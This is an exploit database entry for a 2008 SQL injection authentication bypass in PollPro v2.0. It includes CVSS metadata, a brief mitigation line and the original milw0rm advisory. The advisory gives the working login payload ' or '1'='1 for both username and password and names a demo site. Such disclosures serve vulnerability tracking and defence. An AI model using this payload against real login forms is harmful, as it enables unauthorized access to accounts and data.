PollPro v2.0 SQL Injection AUTH BYPASS

vendor:

PollPro

by:

AlpHaNiX

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PollPro

Affected Version From: v2.0

Affected Version To: v2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:pollpro:pollpro:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PollPro v2.0 SQL Injection AUTH BYPASS

A vulnerability exists in PollPro v2.0 which allows an attacker to bypass authentication by entering ' or '1'='1 as the username and password.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : PollPro
#Version  : v2.0
#download : null
#Demo     : http://www.pollpro.com/pollpro2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
AUTH BYPASS :

username : ' or '1'='1
password : ' or '1'='1


###########################################################################

# milw0rm.com [2008-12-09]